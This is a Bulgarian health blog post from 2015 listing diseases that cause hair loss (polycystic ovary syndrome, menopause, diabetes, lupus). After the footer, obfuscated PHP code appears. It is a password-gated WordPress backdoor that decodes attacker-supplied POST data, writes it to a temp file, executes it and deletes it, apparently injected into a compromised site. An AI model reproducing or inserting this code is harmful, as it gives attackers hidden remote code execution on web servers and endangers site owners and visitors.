Кои болести причиняват косопад? | Косопад

Кои болести причиняват косопад?

kosa-shtitovidna-jleza

Човешкият организъм е съвършена машина с фини настройки и всяко смущение в нормалната му дейност може да предизвика редица неприятни явления, сред които и косопад.

Болести, които влошават състоянието на косата

Синдром на поликистозните яйчници

Жените с това заболяване страдат от мъжки тип косопад , заради хормоналния дисбаланс и увеличеното съдържание на мъжки хормони (андрогени). Този тип алопеция, известна като андрогенна, засяга между 40% и 70% от жените с това заболяване.

Менопауза

При жените в това състояние се забелязва изтъняване на косата. Дължи се на намаляването на естрогена. Това води до косопад, най- вече по темето. Причината отново е хормонален дисбаланс.

kosopad-estrogen

Диабет

При това заболяване тялото не произвежда или не използва правилно инсулина, забавя кръвообращението, което засяга директно косата и възстановяването й. Заради диабета, космените фоликули трудно се възстановяват, новата коса изобщо не пораства и опада. Затова хората с диабет забелязват, че косата им изтънява или пада повече от обичайното.

Лупус

54% от пациентите с лупус страдат от косопад. Той обикновено е временен и не е причина за притеснение. Косата обикновено опада в областта на темето. За да се избавите от този тип косопад, трябва да спазвате лечението за болестта.

Разбира се, има и други заболявания, които също причиняват косопад или други проблеми с косата.

24. февруари 2015 13:24:34 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}